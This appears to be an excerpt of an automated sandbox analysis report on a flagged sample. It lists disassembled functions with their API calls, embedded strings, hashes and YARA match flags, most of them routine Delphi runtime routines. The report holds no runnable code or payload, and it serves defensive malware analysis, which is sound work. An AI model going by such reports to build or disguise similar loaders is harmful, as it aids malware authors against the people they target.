                                                                                        • Instruction ID: 32e322d6933fe4483ff3c3fa85ed250364bff5be8a4ae92083195db0eeb510d2
                                                                                        • Opcode Fuzzy Hash: 0238eb00d718a015d6a17870e1c320297f6e0322f9d5fe124c5846cb226447a8
                                                                                        • Instruction Fuzzy Hash: 0121F239D2A7C0CB7760F9B8400F537F690EF2131175429C9C82F829816E1C4CAB8AC6
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02B614C9 Relevance: .1, Instructions: 77COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000003.2086690283.0000000002B60000.00000004.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_3_2b60000_udVh4Ist4Z.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6c8e3324e2d47020e24b2f647298d262e31213920b099233065d41d159ca4bf0
                                                                                        • Instruction ID: 31a181089fd51a0056ba29fdeeee00ac9401eb8f3bf081234e3df8b3175ae0e5
                                                                                        • Opcode Fuzzy Hash: 6c8e3324e2d47020e24b2f647298d262e31213920b099233065d41d159ca4bf0
                                                                                        • Instruction Fuzzy Hash: FD21BE39D25B80C77391E9BC404F273F6D0AF613557A82DC9C96F83D806A1D886B8EC6
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02B609B0 Relevance: .1, Instructions: 77COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000003.2086690283.0000000002B60000.00000004.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_3_2b60000_udVh4Ist4Z.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ecd097d3be57cd47c7e9075383ca9fd05c48c1cc93e805e191c49a15ddbeb170
                                                                                        • Instruction ID: 649cad9a269c7d3b9d36307d74a1c07fa8feff0cc78ceec16f21d76471f7951f
                                                                                        • Opcode Fuzzy Hash: ecd097d3be57cd47c7e9075383ca9fd05c48c1cc93e805e191c49a15ddbeb170
                                                                                        • Instruction Fuzzy Hash: 1611A43AD09B40C77251F8BA414E276B691FF313547542DCDCA67814C02A1C9C6B8ED7
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02B610BD Relevance: .1, Instructions: 76COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000003.2086690283.0000000002B60000.00000004.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_3_2b60000_udVh4Ist4Z.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 381052d0a0af0934c2846e3330ef183fe16ff7fe64fd93a14aac3997eb3facdf
                                                                                        • Instruction ID: 63d252f8b9526e64e4209bb86814941b20c25c5b61ebb69d77bdafb054f87931
                                                                                        • Opcode Fuzzy Hash: 381052d0a0af0934c2846e3330ef183fe16ff7fe64fd93a14aac3997eb3facdf
                                                                                        • Instruction Fuzzy Hash: B5116F39D26BC0CB7761E9B8404F537B694EF253117A42CC9C82F929816E1C8C6E8BD6
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02B6153D Relevance: .1, Instructions: 71COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000003.2086690283.0000000002B60000.00000004.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_3_2b60000_udVh4Ist4Z.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 475799fc2cf36ba386f4adc40ca0e380ea8360aab5543f6c12f37583c63667ca
                                                                                        • Instruction ID: 774c1eb3bea2d59c96f4445953dec5a164b320888aafa22f5cbe5c392e9d0b42
                                                                                        • Opcode Fuzzy Hash: 475799fc2cf36ba386f4adc40ca0e380ea8360aab5543f6c12f37583c63667ca
                                                                                        • Instruction Fuzzy Hash: D4119339D26B50C77360E9BC404F232F6D0EF613557582DC9C96F83A816A1C882A8F86
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02B61362 Relevance: .1, Instructions: 69COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000003.2086690283.0000000002B60000.00000004.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_3_2b60000_udVh4Ist4Z.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3dd670f08d3713b1694ae4af04bcf86f7dee781d0857d425e9628cee01928871
                                                                                        • Instruction ID: 9a28c9ae146b6ff180bced1e1d93a36fa6021a3dfbe94c00851b6061a9cb0241
                                                                                        • Opcode Fuzzy Hash: 3dd670f08d3713b1694ae4af04bcf86f7dee781d0857d425e9628cee01928871
                                                                                        • Instruction Fuzzy Hash: 22119A39D39680D77750E9BC414F132B690EF6135475899CAC86FC6E806E1C8866CEC7
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02B61531 Relevance: .1, Instructions: 66COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000003.2086690283.0000000002B60000.00000004.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_3_2b60000_udVh4Ist4Z.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 94813ef438d76fa5b1a6a03d0fabb2e97079158e6f7d5092bd163058d3efb34b
                                                                                        • Instruction ID: c3ca7a9a3a14254cc553995f4d5681becdb35bb5ab2f4c208710bb24f93b6b74
                                                                                        • Opcode Fuzzy Hash: 94813ef438d76fa5b1a6a03d0fabb2e97079158e6f7d5092bd163058d3efb34b
                                                                                        • Instruction Fuzzy Hash: 5A11B439D26B40C77351D9B8404F233F6D0EF613557142DC9C96B83A806A1C882B8FC6
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02B614BD Relevance: .1, Instructions: 60COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000003.2086690283.0000000002B60000.00000004.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_3_2b60000_udVh4Ist4Z.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7dcf526487e59b33916602e7a0125df274e9f6d5af2a162c2c924d788fe91999
                                                                                        • Instruction ID: ddf1e89136d404f0e808fc284d4fef4e75822216cb5f4dfb99790af6dbb29194
                                                                                        • Opcode Fuzzy Hash: 7dcf526487e59b33916602e7a0125df274e9f6d5af2a162c2c924d788fe91999
                                                                                        • Instruction Fuzzy Hash: A9119139D25B50C76391E9B8404F272F6D0AF613557682DCDC96B83D806A1D8C6B8E86
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02B609A4 Relevance: .1, Instructions: 60COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000003.2086690283.0000000002B60000.00000004.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_3_2b60000_udVh4Ist4Z.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 438b6a24cce1ca9f7437834823e7443a732e98641c20b5b75ab61c5051014f30
                                                                                        • Instruction ID: 52a5b68fc76ff9cf3d514d7e84df2bfac5c84933d054633781d6e77c3f4e829d
                                                                                        • Opcode Fuzzy Hash: 438b6a24cce1ca9f7437834823e7443a732e98641c20b5b75ab61c5051014f30
                                                                                        • Instruction Fuzzy Hash: 9511C23AD4A790CB7361F8BA010F232F591FF31354B842DC9CA27814C02A1C9C6A8EC7
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02D6D250 Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 02D6D259
                                                                                          • Part of subcall function 02D6D224: GetProcAddress.KERNEL32(00000000), ref: 02D6D23D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressHandleModuleProc
                                                                                        • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                        • API String ID: 1646373207-1918263038
                                                                                        • Opcode ID: cb53e3fafa87f35cd762337d605bae47e4d70c39cac58913a0a722a02f9a58d5
                                                                                        • Instruction ID: fe08115081c04f882757b4426b281bb6521d2b5cf7100bce79533ee62ad18ec0
                                                                                        • Opcode Fuzzy Hash: cb53e3fafa87f35cd762337d605bae47e4d70c39cac58913a0a722a02f9a58d5
                                                                                        • Instruction Fuzzy Hash: B9411461B442065B5218AAAE780C43BBBDBE65D7507F4C41BF444ABB4CDE30FC528E39
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02D76E94 Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 32libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(ole32.dll), ref: 02D76E9A
                                                                                        • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02D76EAB
                                                                                        • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02D76EBB
                                                                                        • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02D76ECB
                                                                                        • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02D76EDB
                                                                                        • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02D76EEB
                                                                                        • GetProcAddress.KERNEL32 ref: 02D76EFB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressProc$HandleModule
                                                                                        • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                                                                                        • API String ID: 667068680-2233174745
                                                                                        • Opcode ID: eaf95afcfad971b6ffc2aa2e9af68feeb47f700aeee5c81efb286e12f65200fc
                                                                                        • Instruction ID: 4ec381ec6ec144d965c39aecc7e84c01b0cb5ec8c80853af5af43a080cd8beff
                                                                                        • Opcode Fuzzy Hash: eaf95afcfad971b6ffc2aa2e9af68feeb47f700aeee5c81efb286e12f65200fc
                                                                                        • Instruction Fuzzy Hash: EAF0A2A09EE7957FB6006BB07C8683A675DD511608740185A6426B5B92FAFCCC184FF0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02D62530 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 254windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 02D628CE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Message
                                                                                        • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                                        • API String ID: 2030045667-32948583
                                                                                        • Opcode ID: b81fc0edec3a7b3e722c254150bf7c0e3fbeba4a73a66728c2425daba520f48d
                                                                                        • Instruction ID: baa4662221fb879332dd121f4568208328709cd99a56a120d19cc2c716266383
                                                                                        • Opcode Fuzzy Hash: b81fc0edec3a7b3e722c254150bf7c0e3fbeba4a73a66728c2425daba520f48d
                                                                                        • Instruction Fuzzy Hash: 2BA1B530A042948BDB21AA2CCC8CBB977E5EB09754F1441E5DD89AB385CF758D89CF61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02D7A058 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 102libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • IsBadReadPtr.KERNEL32(?,00000004,?,00000014), ref: 02D7A078
                                                                                        • GetModuleHandleW.KERNEL32(C:\Windows\System32\KernelBase.dll,LoadLibraryExA,?,00000004,?,00000014), ref: 02D7A08F
                                                                                        • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\KernelBase.dll), ref: 02D7A095
                                                                                        • IsBadReadPtr.KERNEL32(?,00000004), ref: 02D7A123
                                                                                        • IsBadReadPtr.KERNEL32(?,00000002,?,00000004), ref: 02D7A12F
                                                                                        • IsBadReadPtr.KERNEL32(?,00000014), ref: 02D7A143
                                                                                        Strings
                                                                                        • C:\Windows\System32\KernelBase.dll, xrefs: 02D7A08A
                                                                                        • LoadLibraryExA, xrefs: 02D7A085
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Read$AddressHandleModuleProc
                                                                                        • String ID: C:\Windows\System32\KernelBase.dll$LoadLibraryExA
                                                                                        • API String ID: 1061262613-1650066521
                                                                                        • Opcode ID: d5963df5cf4a0a55bf18fcf1962dbe94ca5c5cc99c7cba8cae72cf063d243f89
                                                                                        • Instruction ID: 537138559f90bb928361e8b6027976a5c800233ffe785c3d16a11d75e127359e
                                                                                        • Opcode Fuzzy Hash: d5963df5cf4a0a55bf18fcf1962dbe94ca5c5cc99c7cba8cae72cf063d243f89
                                                                                        • Instruction Fuzzy Hash: F2312D71A41205BBEB20DFA8DC85F6E77A8EF05354F144954EA54AB381E378ED40CBB0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02D6252E Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 188COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        • The sizes of unexpected leaked medium and large blocks are: , xrefs: 02D62849
                                                                                        • The unexpected small block leaks are:, xrefs: 02D62707
                                                                                        • , xrefs: 02D62814
                                                                                        • An unexpected memory leak has occurred. , xrefs: 02D62690
                                                                                        • bytes: , xrefs: 02D6275D
                                                                                        • Unexpected Memory Leak, xrefs: 02D628C0
                                                                                        • 7, xrefs: 02D626A1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                                        • API String ID: 0-2723507874
                                                                                        • Opcode ID: 5d0c7a988e4ae1ae3e24295e56a62cd037ef0998ce9e5d4e479be5e72213e156
                                                                                        • Instruction ID: c4127e61df6809392aae0518e1bbae4fa252ff46d084e40f160bdd4ebeea02b7
                                                                                        • Opcode Fuzzy Hash: 5d0c7a988e4ae1ae3e24295e56a62cd037ef0998ce9e5d4e479be5e72213e156
                                                                                        • Instruction Fuzzy Hash: F0719230A042988FDB219A2CCC8CBE9BBE5EB09754F1441E5D9899B381DB758EC5CF61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02D6BD7C Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetThreadLocale.KERNEL32(00000000,02D6C047,?,?,00000000,00000000), ref: 02D6BDB2
                                                                                          • Part of subcall function 02D6A780: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02D6A79E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Locale$InfoThread
                                                                                        • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                        • API String ID: 4232894706-2493093252
                                                                                        • Opcode ID: be056ba0c3cefa40aa08ed1d5ca11d6ac0053029e8c104674a3db4980bb2d525
                                                                                        • Instruction ID: 983388ba9288dc9eceebdd7c5724ce67c93c2904d5720c9a8f845145d004cce0
                                                                                        • Opcode Fuzzy Hash: be056ba0c3cefa40aa08ed1d5ca11d6ac0053029e8c104674a3db4980bb2d525
                                                                                        • Instruction Fuzzy Hash: D3613034B051899BDB10EBA4D868ABF77B7DF88300F609476E141EB745DA35DD068BB0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02D64320 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02D643E7,?,?,02DC47C8,?,?,02D8B7A8,02D66575,02D8A305), ref: 02D64359
                                                                                        • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02D643E7,?,?,02DC47C8,?,?,02D8B7A8,02D66575,02D8A305), ref: 02D6435F
                                                                                        • GetStdHandle.KERNEL32(000000F5,02D643A8,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02D643E7,?,?,02DC47C8), ref: 02D64374
                                                                                        • WriteFile.KERNEL32(00000000,000000F5,02D643A8,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02D643E7,?,?), ref: 02D6437A
                                                                                        • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 02D64398
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FileHandleWrite$Message
                                                                                        • String ID: Error$Runtime error at 00000000
                                                                                        • API String ID: 1570097196-2970929446
                                                                                        • Opcode ID: e73827c2aaf87945aa215db81f250cad647455d85ab7d9f73cf9f89a1a664314
                                                                                        • Instruction ID: 75b64c5bf07d957f76abd6265a56fd7f4a4b733001f4d17d50fb901ec7ca15ea
                                                                                        • Opcode Fuzzy Hash: e73827c2aaf87945aa215db81f250cad647455d85ab7d9f73cf9f89a1a664314
                                                                                        • Instruction Fuzzy Hash: A9F0F660AC0341BAF621B6A0BC0EF79271C9740B25F244A06B664D53C4C7A48CC89732
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02D6AE80 Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 02D6ACF8: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02D6AD15
                                                                                          • Part of subcall function 02D6ACF8: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02D6AD39
                                                                                          • Part of subcall function 02D6ACF8: GetModuleFileNameA.KERNEL32(02D60000,?,00000105), ref: 02D6AD54
                                                                                          • Part of subcall function 02D6ACF8: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02D6ADEA
                                                                                        • CharToOemA.USER32(?,?), ref: 02D6AEB7
                                                                                        • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 02D6AED4
                                                                                        • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02D6AEDA
                                                                                        • GetStdHandle.KERNEL32(000000F4,02D6AF44,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02D6AEEF
                                                                                        • WriteFile.KERNEL32(00000000,000000F4,02D6AF44,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02D6AEF5
                                                                                        • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 02D6AF17
                                                                                        • MessageBoxA.USER32(00000000,?,?,00002010), ref: 02D6AF2D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 185507032-0
                                                                                        • Opcode ID: ccc626d569f853b86aa0738d4411c86e812e7c8aa03a482d82b1551fad8a3b81
                                                                                        • Instruction ID: a20ceb7516445eedef678657e2762ace4c7c7f0471c6c7f199d184d6d98f9612
                                                                                        • Opcode Fuzzy Hash: ccc626d569f853b86aa0738d4411c86e812e7c8aa03a482d82b1551fad8a3b81
                                                                                        • Instruction Fuzzy Hash: 67118CB65442057FD200EBA4DC89FAA73EDEB44700F400965B294E62E0DA74ED448FB2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02D6E548 Relevance: 9.1, APIs: 6, Instructions: 139COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02D6E5E1
                                                                                        • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02D6E5FD
                                                                                        • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 02D6E636
                                                                                        • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02D6E6B3
                                                                                        • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 02D6E6CC
                                                                                        • VariantCopy.OLEAUT32(?,00000000), ref: 02D6E701
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                        • String ID:
                                                                                        • API String ID: 351091851-0
                                                                                        • Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                        • Instruction ID: cf40c33f8018591119f15516559dc229117cee4661183b7a20566d18b9a8048a
                                                                                        • Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                        • Instruction Fuzzy Hash: 7751E879A006299FCB22DB98D884FE9B7BEEB4D300F0041E5E508A7351D730AF858F61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02D6355C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02D6357E
                                                                                        • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02D635CD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02D635B1
                                                                                        • RegCloseKey.ADVAPI32(?,02D635D4,00000000,?,00000004,00000000,02D635CD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02D635C7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseOpenQueryValue
                                                                                        • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                        • API String ID: 3677997916-4173385793
                                                                                        • Opcode ID: 23c9fcbcc38a48fe145215e183e14f81588aaa8e299b6efbd2e2838cb530a4ac
                                                                                        • Instruction ID: 18aec5c3e991785a56bafd0160923656313942c701ae5a578a35c1256d43de73
                                                                                        • Opcode Fuzzy Hash: 23c9fcbcc38a48fe145215e183e14f81588aaa8e299b6efbd2e2838cb530a4ac
                                                                                        • Instruction Fuzzy Hash: 8F01F575A50248BBEB11DB909C06BBDB3ECEB08B00F1004A2FA04D7780E6749E14DB64
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

